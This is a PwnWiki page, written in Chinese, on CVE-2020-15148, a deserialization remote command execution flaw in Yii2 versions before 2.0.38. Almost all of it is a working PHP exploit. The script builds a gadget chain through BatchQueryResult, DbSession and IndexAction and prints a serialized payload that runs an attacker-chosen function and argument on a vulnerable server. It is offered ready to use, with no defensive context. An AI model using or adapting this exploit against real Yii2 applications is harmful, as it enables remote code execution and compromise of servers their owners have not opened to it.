CVE-2020-15148 Yii框架反序列化遠程命令執行漏洞

From PwnWiki
Revision as of 13:26, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==INFO== Yii2 <2.0.38 ==EXP== <pre> <?php namespace yii\rest { class Action extends \yii\base\Action { public $checkAccess; } class IndexAction exte...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

INFO

Yii2 <2.0.38


EXP


<?php
namespace yii\rest {
    class Action extends \yii\base\Action
    {
        public $checkAccess;
    }
    class IndexAction extends Action
    {
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\base {
    class BaseObject
    {
        //
    }
    class Action
    {
        public $id;
    }
}
namespace yii\db {
    use yii\base\BaseObject;
    class BatchQueryResult extends BaseObject
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
$exp = new \yii\db\BatchQueryResult($func, $param);
print(serialize($exp));
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-15148_Yii框架反序列化遠程命令執行漏洞&oldid=1457"